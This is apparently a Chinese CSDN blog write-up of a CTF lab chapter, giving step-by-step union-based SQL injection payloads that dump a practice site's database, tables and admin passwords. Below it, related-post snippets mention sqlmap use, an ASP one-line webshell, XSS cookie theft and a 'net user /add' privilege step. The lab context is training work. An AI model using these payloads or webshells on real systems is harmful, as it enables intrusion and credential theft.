封神台--尤里的复仇Ⅰ小芳!

最新推荐文章于 2024-05-12 17:08:43 发布
最新推荐文章于 2024-05-12 17:08:43 发布
阅读量132 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59022585/article/details/131620465
版权
文章详细描述了一次针对名为女神小芳的网站进行的SQL注入过程,通过测试1/0和1/1确定了数字型注入。逐步揭露了数据库名称(maoshe)、表名(admin、dirs、news、xss)、字段信息以及admin表的username和password,最终获取到flag为hellohack的敏感数据。
摘要由CSDN通过智能技术生成

目录

第一章:为了女神小芳!

第一章:为了女神小芳!

进入传送门,点击超级链接。注入1/1和1/0,发现1/0有明显变化,1/1无变化,先确定为数字型注入。

注入1 order by n,n取1-3,当n为1和2时页面正常,当为3是页面异常,判断回显字段最多为2个。

注入100 union select 1,2,得到一个回显位(2)。

注入100 union select 1,database()回显出数据库(maoshe)。

注入100 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='maoshe')回显出数据库中的表(admin、dirs、news、xss)。

注入100 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='admin')回显admin表中的字段(Id、username、password )。

注入100 union select 1,(select group_concat(username) from admin)回显admin表中username字段(admin、ppt领取微信 )。

注入100 union select 1,(select group_concat(password) from admin)回显admin表中password字段(hellohack、zkaqbanban),其中flag为hellohack。

尤里复仇小芳
HNU凌风的博客
03-10 810
第一章:为了女神小芳! Tips: 通过sql注入拿到管理员密码! 尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站 学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了传送门(小芳公司网站). 第一步,判断是否存在sql注入漏洞 在网站后构造?id=1 and 1=1 ,然后回车 页面返回正常 再次构造 ?id=1 and 1=2 然后回车 这里页面返回异常,初步判断这里可能存在一个sql注入漏洞 第二步:判断字段数 构造 ?id=1 and 1=1 or
神台sql注入---第一章节: 为了女神小芳
qq_52573109的博客
09-14 835
1:靶场链接: https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7 2:解题过程: (1):打开传送门,点击"点击查看新闻"发现url出现参数 id = 1,猜测为注入点。 (2):判断字段个数: 注入代码: order by 2 ...
神台尤里复仇小芳 第八章
最新发布
shierbai的博客
05-12 166
看到有验证码,我最先考虑的是用插件进行验证码识别然后进行爆破,但此处大米cms存在验证码复用的漏洞,所以大家信息收集要做好。bp抓包,右键send to intruder。没扫出来,先进robots.txt看看。随便输点什么,验证码一定要输对。这关最简单了,丢工具完事。审题,因此做后台扫描。
神台——尤里复仇小芳
ASD830的博客
03-21 549
我们可以查出“admin“”表里 有 “id” “username” “password” 三个字段。题目说让我们拿到管理员账户的密码,我们看一下username和password字段的内容。尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站。根据提示我们需要浅浅的sql注入一下,首先判断一下是否存在SQL注入漏洞。学过一点黑客技术的他,想在女神面前炫炫技。页面不正常,说明存在SQL注入漏洞。页面出现了2,说明我们的回显位为2。页面不正常,判断出字段数为2。
神台靶场---尤里复仇小芳!---第二章遇到阻难!绕过WAF过滤!
qq_44336568的博客
06-28 2673
神台----尤里复仇I-第二章:遇到阻难!绕过WAF过滤!渗透学习、靶场练习
神台——第一题:为了女神小芳
分享简单的安全技术
01-17 726
题目:获取数据库管理员密码 题目传送阵 渗透步骤        第一步:点击“点击查看新闻”超链接,跳转到一个页面,url发生改变,设想这个页面存在sql漏洞。        第二步:输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch,使用sqlmap对该页面进行扫描,看该页面是否存在漏洞,从结果得知可以从基
神台----尤里复仇I-第六章:SYSTEM!POWER!
正在学习的路上...
07-19 1555
通过上一章,上传的shell,使用菜刀连接 右键点击 输入命令 whoami 权限不足,这里需要用到提权工具,工具在 就不用再上传了。 右键点击cmd.exe,打开虚拟终端,输入whoami,可以看到当前用户。 尝试创建用户命令: net user 110 110 /add 还是权限不足。 这是因为cmd需要用到外部接口wscript.shell。 但是wscript.shell仍然...
神台----尤里复仇I-第五章:进击!拿到Web最高权限!
正在学习的路上...
07-18 1969
1.使用cookie进入后台 根据提示信息 需要用到上个关卡的cookie,去XSS平台拿到cookie,删去flag=zkz{****}, 点击之前,打开Burp,进行抓包,替换cookie 放行,进入后台页面。 2.找上传点 在产品管理-添加产品中可以上传图片。 上传带asp一句话的图片, asp一句话:<%eval request (“hacker”)%> 木马一般会被拦截...
神台----尤里复仇I-第二章:遇到阻难!绕过WAF过滤!
正在学习的路上...
07-18 3579
1.找注入点 进去之后,查看新闻,一般在这里有注入点。 输入 ?id=168 and 1=1 过滤了一些关键字,通过测试没有过滤 == order by == 2.猜列数、报显示位 通过测试,发现查询了10列 ?id=171 order by 10 ?id=466454 select 1,2 ------将id设为一个不存在的数,看显示位 3.查看数据库版本和当前数据库名 ?id=1...
神台----尤里复仇I-第三章:这个后台能识别登录者…
正在学习的路上...
07-18 1953
根据提示,真正的后台地址为admin123,输入上一关的账号、密码进去。 分析代码: 从请求头中拿到Referer,并赋值给ComeUrl。 判断ComeUrl是否为空,若是空,则表明是直接输入地址访问。本题不允许 ComeUrl不为空, 读取Host,并在前面拼接 http:// 赋值给cUrl,如果ComeUrl有 " : ",表明有端口号,在为cUrl 加上端口号。 最后判断cUrl和...
获取目标服务器c盘下flag文件信息,公开课基础演练靶场 第六章 webshell控制目标详细解题思路...
weixin_42442653的博客
08-06 1168
我看见第六章的传送门上写着大大的两个字--提权!!在上一章中,我已经通过上传一句话马,用菜刀连接了上传的这个文件,从而得到了后台的部分权限。但是我试过,现在拥有的权限,还不能打开c盘中的文件。而C盘中的文件往往都是比较重要的,因此,我需要提升自己的权限,如下图。进入传送门后,发现这一章的网站仍然是之前看到过的那个。而这个网站的管理员cookie已经被我拿到,并且已经成功上传一句话马至服务器了,如下...
神台靶场 第一章:为了女神小芳 (SQL注入)
m0_65712192的博客
10-14 1898
神台靶场 第一章:为了女神小芳 (SQL注入)
SQL注入之猫舍
weixin_64809022的博客
07-05 376
SQL注入
神台在线靶场--尤里复仇小芳!【8题】
feiniaotjx的博客
10-20 9773
靶场练习 神台-掌控安全在线演练靶场 第一章:为了女神小芳
注入(一)
tomyyyyy
06-28 304
eg: 例子 第一步,判断是否存在sql注入漏洞 构造 ?id=1 and 1=1 ,回车 页面返回正常 构造 ?id=1 and 1=2 ,回车 页面不正常,初步判断这里 可能 存在一个注入漏洞 第二步:判断字段数 构造 ?id=1 and 1=1 order by 1 回车 页面正常 构造 ?id=1 and 1=1 order by 2 回车 页面正常 构造 ?id=1 and 1=1 o...
神台----尤里复仇I-第一章:为了女神小芳
正在学习的路上...
07-17 3060
1.找注入点 ?id=1 and 1=1 ------ 显示正常 ?id=1 and 1=2 ------ 不显示 2.猜列数、报显示位 ?id=1 order by 2 ------查询了两列 ?id=466454 select 1,2 ------将id设为一个不存在的数...
神台靶场 第一章:为了女神小芳!writeup
热门推荐
Sk1y的博客
02-15 2万+
神台靶场 第一章:为了女神小芳! 题目简述: 神台靶场,题目链接 解题过程: 首先是这样的url为: http://59.63.200.79:8003/ 当点击点击查看新闻时,相应的url变化,变为如下: http://59.63.200.79:8003/?id=1 ...
神台-尤里复仇
weixin_44522540的博客
02-20 886
神台-尤里复仇Ⅰ 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录神台-尤里复仇Ⅰ前言一、为了女神小芳二、1.引入库2.读入数据三、四、为了更多的权限!留言板!五、六、七、八、九、总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的
神台-靶场-第一章:为了女神小芳!(题解)+ 中北网安实训笔记-(20200701)-sql注入基本语法
tonyhapply的博客
07-18 1629
我们先来学习sql注入,
尤里复仇WIN10全屏补丁,解决黑屏问题
资源摘要信息:"尤里复仇WIN10全屏切换不黑屏补丁" 一、标题知识点解析: 1.尤里复仇尤里复仇是指《红色警戒2:尤里复仇》(Command & Conquer: Red Alert 2 - Yuri's Revenge),这是一款在2001年发布的即时...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值